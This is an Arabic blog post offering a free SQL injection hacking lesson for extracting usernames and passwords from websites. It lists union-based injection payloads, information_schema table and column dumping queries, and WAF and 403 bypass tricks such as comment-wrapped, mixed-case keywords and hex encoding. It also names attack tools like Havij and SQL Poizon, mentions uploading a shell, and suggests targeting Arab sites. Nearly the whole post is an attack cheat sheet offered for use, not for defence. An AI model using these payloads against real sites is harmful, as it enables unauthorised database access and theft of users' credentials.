هذي مجموعه اذا حبيت الاختراق بطريقه استخراج اليوزرنيم والباسبورت بطريقه اخره SqL Injection

,
مشاهدات الان
sfehthayef.blogspot.com
لا تتعب نفسك بالبحث عن حل في هذا الدرس وبإختصار راح تدعيلي وهذا اللى ابيه : اتمني اكون إيب ابو عيال :)
 المهم راح ارفع لكم ملف ومهم في التطبيق وهو SQL File (.sql)
 في اي تطبيق تحتاجه وهو خاص لتكوين قاعده بينات
 
 وراح نطبق كيف :-
 * كيف نجد الموقع locations
 * كيف نرفع الشيل Shell - sql
 * كيف استخراج البيانات Data extraction
 * كيف ننشئ قاعده create a database
 ===================== هنا الاهم البرامج المستخدمه
 معي هكركوز الكويت نبذه عن HAVIJ وعلاقته بـ SQL SERVER ومن مصادرهم الرسميه وكيفيت التطبيق
 تعلم كيف تدمج قالب بي اج بي الى الحقنه الاس كيو ال SQL
 برامج SQL POIZON V1.1 بالصوره
 Sculptor V1 1
 ينافس HAVIJ
 وفي المجلد data
 تقدر تضيف ما تحب من اكواد اخره مثلا عربيه بطريقه الترجمه لاختراق العرب :(
 ===================== هذي مجموعه من برامج التى تستخدم في المواقع الرسمي والشخصيه
 phpMyAdmin
 اقرب مثال لبحث عن من استخدم مثل هذي الخدمه بعد التنزيل ويحسن تتعرف على المجلدات والملفات للبحث عنها
 ir/libraries/common.inc.php'
 ===
 phpLiteAdmin
 Adminer
 MyWebSQL
 RockMongo
 =====================
 جميع أوامر
 SqL Injection
 أوامر تخطي
 Forbidden 403
 أوامر تخطي
 Not Acceptable
 أوامر التـشفــيــر أثناء الحقن
 أوامر تخطي عدم ظهور عدد الأعمدة
 ---------------------------------
 أوامر SqL Injection
 ---------------------------------
 أمر استخراج عدد الأعمدة
 ---------------------------------
 +order+by+
 ---------------------------------
 أمر استخراج العامود المصاب
 ---------------------------------
 +union+select+
 ---------------------------------
 أمر استخراج اسم قاعدة البيانات
 ---------------------------------
 Database()
 ---------------------------------
 أمر استخراج اصدار قاعدة البيانات
 ---------------------------------
 Version()
 ---------------------------------
 أمر استخراج يوزر قاعدة البيانات
 User()
 ---------------------------------
 أمر استخراج الجداول
 ---------------------------------
 يوضع هذا الأمر مكان العامود المصاب
 ---------------------------------
 group_concat(table_name)
 ---------------------------------
 ويوضع هذا الأمر في نهاية الرابط
 ---------------------------------
 +from+information_schema.tables+where+table_schema =database()--
 ---------------------------------
 أمر استخراج الأعمدة
 ---------------------------------
 يوضع هذا الأمر مكان العامود المصاب
 ---------------------------------
 group_concat(column_name)
 ---------------------------------
 ويوضع هذا الأمر في نهاية الرابط
 ---------------------------------
 +from+information_schema.columns+where+table_schem a=database()--
 ---------------------------------
 أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
 ---------------------------------
 تخطي Forbidden 403 اثناء استخراج العامود المصاب
 ---------------------------------
 اضافة الفلتر
 ---------------------------------
 /*! */
 ---------------------------------
 على كلمة
 ---------------------------------
 select
 ---------------------------------
 لتصبح بهذا الشكل
 ---------------------------------
 /*!select*/
 ---------------------------------
 واذا لم تنجح الطريقة العب بكلمة
 ---------------------------------
 select
 ---------------------------------
 لتصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 احرف سمول وأحرف كابتل
 ---------------------------------
 تخطي Forbidden 403 اثناء استخراج الجداول
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 select
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 group_concat(table_name)
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!GrOuP_CoNcAT(table_name)*/
 ---------------------------------
 وتعديل الامر
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 +from+information_schema.tables+where+table_schema =database()--
 ---------------------------------
 تخطي Forbidden 403 اثناء استخراج الجداول
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 select
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 group_concat(column_name)
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!GrOuP_CoNcAT(column_name)*/
 ---------------------------------
 وتعديل الامر
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 +from+information_schema.columns+where+table_schem a=database()--
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 +
 ---------------------------------
 from+information_schema./*!columns*/+where+table_schema=database()--
 ---------------------------------
 أوامر تخطي Not Acceptable
 ---------------------------------
 تخطي Not Acceptable اثناء استخراج العامود المصاب
 ---------------------------------
 اضافة الفلتر
 ---------------------------------
 /*! */
 ---------------------------------
 على كلمة
 ---------------------------------
 select
 ---------------------------------
 لتصبح بهذا الشكل
 ---------------------------------
 /*!select*/
 ---------------------------------
 واذا لم تنجح الطريقة العب بكلمة
 ---------------------------------
 select
 ---------------------------------
 لتصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 احرف سمول وأحرف كابتل
 ---------------------------------
 تخطي
 Not Acceptable
 اثناء استخراج الجداول
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 select
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 group_concat(table_name)
 ---------------------------------
 ليصبح بالشكل دا
 ---------------------------------
 /*!GrOuP_CoNcAT(table_name)*/
 ---------------------------------
 تخطي Not Acceptable اثناء استخراج الجداول
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 select
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 /*!SeLeCt*/
 ---------------------------------
 التعديل بالأمر
 ---------------------------------
 group_concat(column_name)
 ---------------------------------
 ليصبح بالشكل دا
 ---------------------------------
 /*!GrOuP_CoNcAT(column_name)*/
 ---------------------------------
 أوامر تخطي الحماية من بعض الأوامر
 ---------------------------------
 هذا الأمر نضعه مكان العامود المصاب
 ---------------------------------
 concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
 ---------------------------------
 وهذا الأمر نضعه في نهاية الرابط
 ---------------------------------
 +from+information_schema.columns--
 ---------------------------------
 أوامر تخطي عدم ظهور عدد الأعمدة
 ---------------------------------
 نقوم باضافة
 ---------------------------------
 +--+
 ---------------------------------
 في نهاية الرابط
 ---------------------------------
 واضافة
 العلامة التي بين قوسين
 ---------------------------------
 (')
 ---------------------------------
 بعد
 ---------------------------------
 .php?id=1
 ---------------------------------
 ليصبح بهذا الشكل
 ---------------------------------
 .php?id=1'
 تعلم معي هكركوز الكويت بلا مقابل غير ذكر المصدر

اذا حبيت نسخ المقالهـ

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)